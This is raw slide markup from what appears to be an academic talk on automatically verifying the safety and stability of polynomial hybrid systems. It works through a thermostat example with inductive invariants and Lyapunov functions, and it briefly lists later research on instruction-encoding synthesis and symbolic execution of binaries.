              <a:rPr lang="en-US" sz="2714" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> is Lipchitz continuous)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discrete switching logic between modes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2714" dirty="0" smtClean="0"/>
              <a:t>specified using guards </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2714" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2714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ij</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2714" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>(x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2714" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times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Example: Thermostat (ON and OFF mode)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are interested in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Safety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Stability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> properties</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
              <a:latin typeface="Times"/>
              <a:cs typeface="Times"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
              <a:latin typeface="Times"/>
              <a:cs typeface="Times"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
              <a:latin typeface="Times"/>
              <a:cs typeface="Times"/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6" name="Group 78"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4038600" y="4191000"/>
            <a:ext cx="4800600" cy="1601788"/>
            <a:chOff x="4038600" y="4191000"/>
            <a:chExt cx="4800600" cy="1601788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4040188" y="4560332"/>
              <a:ext cx="4799012" cy="1166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038600" y="5791200"/>
              <a:ext cx="480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620000" y="4191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Safety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20000" y="5410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Safety</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 107"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3733800" y="4668315"/>
            <a:ext cx="5257800" cy="521732"/>
            <a:chOff x="3657600" y="4635311"/>
            <a:chExt cx="5257800" cy="521732"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="TextBox 53"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3657600" y="484926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72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543800" y="4635311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Stability</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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3962400" y="5004643"/>
              <a:ext cx="4800600" cy="2"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="660066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8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3733800" y="4757404"/>
            <a:ext cx="4267200" cy="762000"/>
            <a:chOff x="3657600" y="4724400"/>
            <a:chExt cx="4267200" cy="762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648994" y="4876800"/>
              <a:ext cx="989806" cy="6096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638800" y="4876800"/>
              <a:ext cx="989806" cy="6096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629400" y="4876800"/>
              <a:ext cx="838200" cy="457200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14800" y="4724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ON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800" y="5029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OFF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2800" y="49530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OFF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54" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="4165180" y="4674023"/>
              <a:ext cx="280240" cy="6858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657600" y="499619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70</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1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96000" y="4724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ON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114"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="228600" y="3917836"/>
            <a:ext cx="3276600" cy="2559164"/>
            <a:chOff x="152400" y="3886198"/>
            <a:chExt cx="3276600" cy="2559164"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="114" name="Rounded Rectangle 113"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="152400" y="3886198"/>
              <a:ext cx="3124994" cy="23013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4800" y="3886200"/>
              <a:ext cx="3124200" cy="255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200" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>Thermostat</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="374904" indent="-283464">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:buFont typeface="Arial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latin typeface="Calibri"/>
                  <a:cs typeface="Calibri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ON mode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>dT/dt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t> = +1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="374904" indent="-283464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OFF mode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>dT/dt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t> = -1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="374904" indent="-283464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>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>Switching Logic</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="685800" lvl="1" indent="-283464">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:buFont typeface="Lucida Grande"/>
                <a:buChar char="-"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>ON to OFF</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>T </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>≥</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t> 75 </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="685800" lvl="1" indent="-283464">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:buFont typeface="Lucida Grande"/>
                <a:buChar char="-"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>OFF to ON</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>T ≤ 65</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="374904" indent="-283464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>
                  <a:latin typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>Initial State: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>T = 70</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>   </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Rounded Rectangular Callout 115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="3742246"/>
            <a:ext cx="1524000" cy="914401"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -65000"/>
              <a:gd name="adj2" fmla="val 1077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Many other trajectories are possible</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 79"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3353594" y="3894647"/>
            <a:ext cx="6323806" cy="2506153"/>
            <a:chOff x="3353594" y="3894647"/>
            <a:chExt cx="6323806" cy="2506153"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="TextBox 49"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3733800" y="44166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80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33800" y="56358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</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1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973388" y="5036853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035552" y="6077188"/>
              <a:ext cx="4952206" cy="2382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58200" y="6031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3594" y="3894647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014216" y="5489388"/>
              <a:ext cx="91440" cy="44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14216" y="4879788"/>
              <a:ext cx="91440" cy="44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023360" y="5791200"/>
              <a:ext cx="91440" cy="44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023360" y="4572000"/>
              <a:ext cx="91440" cy="44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4083050"/>
            <a:ext cx="4724400" cy="2165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Safety for single mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>dx/dt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>f(x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>)) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: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Find an invariant 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Inv</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="283464" indent="-192024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"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>∀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: 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Init(x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) =&gt; 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Inv(x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)             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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(Init)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" i="1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marL="283464" indent="-192024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"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>∀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: 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Inv(x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) =&gt; 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Safe(x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)            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(Safe)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="283464" indent="-192024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"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>∀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: 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Inv(x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) =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Inv(Next(x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>))    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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Ind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lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5486400" y="3352802"/>
            <a:ext cx="3429000" cy="2853373"/>
            <a:chOff x="5410200" y="3352802"/>
            <a:chExt cx="3429000" cy="2853373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5410200" y="3352802"/>
              <a:ext cx="3429000" cy="2853373"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -75224"/>
                <a:gd name="adj2" fmla="val 39981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en-US" sz="2000" dirty="0" smtClean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3429000"/>
              <a:ext cx="3352800" cy="205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 smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>At all points on boundary </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000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T(c</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000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x</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>) = 0</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>, field </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000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f</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> must point “inwards”</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="283464" indent="-192024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▽</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US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T(c</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>) . </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US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f</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>  &gt; 0      </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>(incomplete)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="283464" indent="-192024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▽</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US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T(c</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>) . </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US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f</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>≥</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t> 0      </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>(unsound)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="283464" indent="-192024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  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>… 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+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236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595" b="1" dirty="0" smtClean="0"/>
              <a:t>Problem:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2595" dirty="0" smtClean="0"/>
              <a:t> Automatically verify safety and stability properties of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2595" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>polynomial hybrid systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2595" dirty="0" smtClean="0"/>
              <a:t>Approach: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2595" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deductive Verification </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2595" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(by solving ∃∀ constraints)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2378" u="sng" dirty="0" smtClean="0"/>
              <a:t>Safety</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2378" dirty="0" smtClean="0"/>
              <a:t>: Exhibit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2378" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inductive Invariant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2378" u="sng" dirty="0" smtClean="0"/>
              <a:t>Stability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2378" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2378" dirty="0" smtClean="0"/>
              <a:t> Exhibit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2378" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inductive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2378" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lyapunov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2378" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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5084064"/>
            <a:ext cx="2895600" cy="969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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Our result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>: relatively complete check for the class of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>convex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> invariants       </a:t>
            </a:r>
          </a:p>
          <a:p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600200" y="3352800"/>
            <a:ext cx="3124200" cy="654050"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20185"/>
              <a:gd name="adj2" fmla="val 15376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Use a template </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>T(c</a:t>
            </a:r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) ≥ 0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1219200"/>
            <a:ext cx="8991600" cy="167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3464">
              <a:lnSpc>
                <a:spcPct val="12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indent="-283464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Deductive Verification of Continuous Dynamical Systems </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="254061"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[FSTTCS’09]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-283464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Synthesizing Switching Logic using Constraint Solving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[VMCAI’09]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-283464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Switching Logic Synthesis for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reachability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254061"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[EMSOFT’10]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-283464">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" baseline="-25000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-283464">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" baseline="-25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Research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2667000"/>
            <a:ext cx="8610600" cy="20574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Automated Synthesis of Processor Instruction Encodings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>(with Patrice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Godefroid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Symbolic Instruction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572000" cy="3733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29" dirty="0" smtClean="0"/>
              <a:t>Symbolic Execution of Binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Static</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Techniques:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Verification Condition Generation, Bounded model checking, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SuperOptimization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Tools:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Boogie, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SymDiff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,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Dynamic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
